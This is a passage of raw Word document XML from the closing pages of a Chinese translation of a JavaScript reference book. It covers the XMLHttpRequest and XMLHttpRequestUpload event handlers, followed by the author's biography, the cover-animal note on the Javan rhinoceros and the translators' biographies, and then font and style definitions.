        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>事件之后当前请求成功或失败时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onloadstart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当请求开始时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当响应主体正在下载时重复触发（约每</w:t>
      </w:r>
      <w:r>
        <w:t>50ms</w:t>
      </w:r>
      <w:r>
        <w:t>一次）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性改变时触发，当响应完成时这个事件最重要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ontimeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的时间已经过去但响应依旧没有完成时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="890" w:name="XMLHttpRequestUpload"/>
      <w:r>
        <w:t>XMLHttpRequestUpload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="890"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XMLHttpRequestUpload</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义一系列事件处理程序注册属性，用于监视</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体上传的进度。在实现</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest Level 2</w:t>
      </w:r>
      <w:r>
        <w:t>标准的浏览器中，每个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象都有一个指代这类对象的</w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t>属性。要监</w:t>
      </w:r>
      <w:r>
        <w:t>视请求上传的进度，只须简单地将这个属性设置为一个适当的事件处理函数或调用</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>方法。注意，这儿定义的上传进度事件处理程序和</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>自己定义的下载进度事件处理程序完全一样，除了在这个对象中没有</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechage</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onabort</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当上传中止时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当上传因为网络错误失败时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当上传成功时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onloadend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当上传结束时触发，无论上传上否成功。</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件总是跟在一个</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>事件之后。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onloadstart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当上传开始时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上传过程中重复触发（约每</w:t>
      </w:r>
      <w:r>
        <w:t>50ms</w:t>
      </w:r>
      <w:r>
        <w:t>一次）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ontimeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当上传因为</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>超时而中止时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="891" w:name="Zuo_Zhe_Jie_Shao_____David_FlanaganShi_Y"/>
      <w:bookmarkStart w:id="892" w:name="Zuo_Zhe_Jie_Shao_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>作者介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="891"/>
      <w:bookmarkEnd w:id="892"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>David Flanagan</w:t>
      </w:r>
      <w:r>
        <w:t>是一名程序员，也是一名作家，它的个人网站是</w:t>
      </w:r>
      <w:r>
        <w:t>http://davidflanagan.com</w:t>
      </w:r>
      <w:r>
        <w:t>。他在</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>出版的其他畅销书还包括《</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript Po</w:t>
      </w:r>
      <w:r>
        <w:t>cket Reference</w:t>
      </w:r>
      <w:r>
        <w:t>》、《</w:t>
      </w:r>
      <w:r>
        <w:t>The Ruby Programming Language</w:t>
      </w:r>
      <w:r>
        <w:t>》以及《</w:t>
      </w:r>
      <w:r>
        <w:t>Java in a Nutshell</w:t>
      </w:r>
      <w:r>
        <w:t>》。</w:t>
      </w:r>
      <w:r>
        <w:t>David</w:t>
      </w:r>
      <w:r>
        <w:t>毕业于麻省理工学院，获得计算机科学与工程学位。他和妻子和孩子一起生活在西雅图和温哥华之间的美国太平洋西北海岸。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="893" w:name="Feng_Mian_Jie_Shao_____Ben_Shu_Feng_Mian"/>
      <w:bookmarkStart w:id="894" w:name="Feng_Mian_Jie_Shao_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>封面介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="893"/>
      <w:bookmarkEnd w:id="894"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书封面上的动物是爪哇犀牛（</w:t>
      </w:r>
      <w:r>
        <w:t>Javan rhinoceros</w:t>
      </w:r>
      <w:r>
        <w:t>）。犀牛共有</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>种，都以庞大的体型、粗厚如装甲的皮肤、三趾蹄以及一个或两个犀牛角著称。其中爪哇犀牛是除了苏门答腊犀牛之外栖息在森林中的两个种类之一。爪哇犀牛与印度犀牛外表非常类似，但</w:t>
      </w:r>
      <w:r>
        <w:t>体格稍小一些，皮肤纹理有明显不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在人们的印象中，犀牛总是站着，把犀牛角深入水或泥中。它们经常如此。不在河里呆着时，犀牛会到泥里挖一个很深的坑，在里面打滚。它们的栖息地有两个优点。首先是可以减轻热带的酷热，并防治止吸血蚊虫的叮咬（打滚留下的泥也可以防止蚊蝇叮咬）。其次，泥坑或河水还可以有助于支撑犀牛庞大的身躯，减轻它们腿部和背部的负担。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>长久以来，民间传说犀牛的角富于魔力，而且拥有犀牛角的人也可以获得这种魔力。这是犀牛成为偷猎者主要目标的原因之一。各种犀牛都濒临灭绝，其中爪哇犀牛最为稀少，地球上存活的尚不</w:t>
      </w:r>
      <w:r>
        <w:t>足</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>只。爪哇犀牛曾经遍布整个东南亚，但如今只有在印度尼西亚和越南也许还能找到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书封面绘图来自于</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>世纪的</w:t>
      </w:r>
      <w:r>
        <w:t>Dover</w:t>
      </w:r>
      <w:r>
        <w:t>画报中的版画。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="895" w:name="Yi_Zhe_Jian_Jie_____Li_Jing__Hua_Ming_Ba"/>
      <w:bookmarkStart w:id="896" w:name="Yi_Zhe_Jian_Jie_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>译者简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="895"/>
      <w:bookmarkEnd w:id="896"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>李晶，花名拔赤，淘宝前端工程师，具有多年前端开发经验，在团队协作、框架开发等方面有深入研究，曾经参与淘宝彩票、保险和淘宝首页等项目开发。他翻译过《</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript Web Applications</w:t>
      </w:r>
      <w:r>
        <w:t>》和《</w:t>
      </w:r>
      <w:r>
        <w:t>What is Node?</w:t>
      </w:r>
      <w:r>
        <w:t>》书籍，热爱分享，喜欢折腾。微博</w:t>
      </w:r>
      <w:r>
        <w:t>http://weibo.com/jayli</w:t>
      </w:r>
      <w:r>
        <w:t>。李晶负责翻译本书的第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章以及</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>张散集，</w:t>
      </w:r>
      <w:r>
        <w:t>花名一舟，淘宝前端工程师。他主要从事技术管理，负责淘宝网（北京）的新业务技术和前端团队，热爱前端新技术的推广与应用。张散集负责翻译本书第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章、第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>吴英杰，花名季札，博客</w:t>
      </w:r>
      <w:r>
        <w:t>http://oldj.net</w:t>
      </w:r>
      <w:r>
        <w:t>。他毕业于一所著名的理工院校，学的却是经济学，曾服务于一家从事黄金投资的公司，后转投互联网，目前就职于淘宝，致力于通过技术手段度量及改善用户体验的工作。他爱编程，也爱涂鸦；爱生活，也爱折腾。吴英杰负责翻译第三部分和第四部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>赵静，网名</w:t>
      </w:r>
      <w:r>
        <w:t>goddyzhao</w:t>
      </w:r>
      <w:r>
        <w:t>，淘宝花名澄净，淘宝前端工程师。赵静毕业于</w:t>
      </w:r>
      <w:r>
        <w:t>复旦大学软件工程，目前负责淘宝旺铺平台的前端工作。赵静翻译过《</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Up and Running</w:t>
      </w:r>
      <w:r>
        <w:t>》等书籍。赵静是文艺运动</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>前端青年，乐于分享，酷爱新鲜事物。其博客地址</w:t>
      </w:r>
      <w:r>
        <w:t>:http://goddyzhao.tumblr.com</w:t>
      </w:r>
      <w:r>
        <w:t>。赵静负责翻译第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>陈成，花名云谦，淘宝前端工程师，从事前端开发多年，在前端测试、前端性能方便小有研究，曾参与淘宝交易、宝贝详情、店铺系统、淘宝</w:t>
      </w:r>
      <w:r>
        <w:t>Labs</w:t>
      </w:r>
      <w:r>
        <w:t>、淘宝首页等项目开发。他热爱工作，热爱生活。陈成负责翻译第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>王保平，花名玉伯，富应用开发工程师。他在前端架构</w:t>
      </w:r>
      <w:r>
        <w:t>、性能优化、知识管理等方面有深入研究，主导过前端基础类库</w:t>
      </w:r>
      <w:r>
        <w:t>KISSY</w:t>
      </w:r>
      <w:r>
        <w:t>、模块化开发框架</w:t>
      </w:r>
      <w:r>
        <w:t>SeaJS</w:t>
      </w:r>
      <w:r>
        <w:t>等项目的开发。他努力用开放的心态，打造专业的人生。王保平负责翻译第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>鄢学，阿里巴巴云手机开发者运营负责人，常用</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>：秦歌、三七。他对</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>标准、前端开发模式、性能优化和自动化有较深入的研究，目前专注于从</w:t>
      </w:r>
      <w:r>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:t>领域的设计、技术和业务间的结合。他业余时间参与翻译了《</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>The Good Parts</w:t>
      </w:r>
      <w:r>
        <w:t>》和《</w:t>
      </w:r>
      <w:r>
        <w:t>Even Faster Web Sites:Performance Best Pr</w:t>
      </w:r>
      <w:r>
        <w:t>actices for Web Developers</w:t>
      </w:r>
      <w:r>
        <w:t>》，博客是</w:t>
      </w:r>
      <w:r>
        <w:t>http://dancewithnet.com</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>@kavenyan</w:t>
      </w:r>
      <w:r>
        <w:t>。鄢学负责翻译本书第</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章、第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002108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microsoftyahei">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="华文楷体">
    <w:panose1 w:val="02010600040101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="080F0000" w:usb2="00000010" w:usb3="00000000" w:csb0="0004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420"/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:compat>
    <w:useFELayout/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00210880"/>
    <w:rsid w:val="00210880"/>
    <w:rsid w:val="005B0694"/>
    <w:rsid w:val="00923A94"/>
    <w:rsid w:val="00A817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996152F-CC76-4907-818C-BE842B7F1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zh" w:eastAsia="zh" w:bidi="zh"/>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line="288" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier" w:eastAsia="Courier" w:hAnsi="Courier" w:cs="Courier"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="67" w:afterLines="67" w:line="880" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="83" w:afterLines="83" w:line="800" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="800" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="133" w:afterLines="133" w:line="720" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>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spacing w:beforeLines="100" w:afterLines="100" w:line="640" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para04">
    <w:name w:val="Para 04"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="640" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="华文楷体" w:eastAsia="华文楷体" w:hAnsi="华文楷体" w:cs="华文楷体"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para05">
    <w:name w:val="Para 05"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="640" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="华文楷体" w:eastAsia="华文楷体" w:hAnsi="华文楷体" w:cs="华文楷体"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para06">
